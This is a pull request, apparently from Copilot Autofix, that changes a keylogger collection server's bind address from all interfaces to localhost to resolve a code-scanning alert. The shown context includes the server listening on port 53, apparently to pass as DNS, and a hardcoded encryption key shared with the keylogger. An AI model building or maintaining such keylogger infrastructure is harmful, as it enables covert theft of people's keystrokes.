### PR TITLE
Potential fix for code scanning alert no. 4: Binding a socket to all network interfaces

### DIFF
--- a/Linux/Keylogger/server.py
+++ b/Linux/Keylogger/server.py
@@ -7,7 +7,7 @@ logging.basicConfig(filename='server.log', level=logging.DEBUG,
                     format='%(asctime)s - %(levelname)s - %(message)s')
 
 # Configuration
-SERVER_ADDRESS = ('0.0.0.0', 53)
+SERVER_ADDRESS = ('127.0.0.1', 53)
 # Replace with the same key used in the keylogger
 ENCRYPTION_KEY = 'b-cAg-xe8OS8kIn1FU-_g1vzwfCvOEzPIrHbMNLA_CI='
 cipher = Fernet(ENCRYPTION_KEY)


### PR DESCRIPTION
Potential fix for [https://github.com/s3bu7i/linux-network-win-tools/security/code-scanning/4](https://github.com/s3bu7i/linux-network-win-tools/security/code-scanning/4)

To fix the problem, update the `SERVER_ADDRESS` tuple so that the socket binds only to a specific interface rather than all interfaces. For most cases, binding to `127.0.0.1` restricts the socket to only accept local connections, dramatically reducing external exposure. If remote access on a particular internal IP address is required, replace `'0.0.0.0'` with that IP. Edit the code in `Linux/Keylogger/server.py` so that the definition of `SERVER_ADDRESS` uses `'127.0.0.1'` (or another appropriate dedicated IP address) instead of `'0.0.0.0'`. No additional imports or methods are required.

---


_Suggested fixes powered by Copilot Autofix. Review carefully before merging._
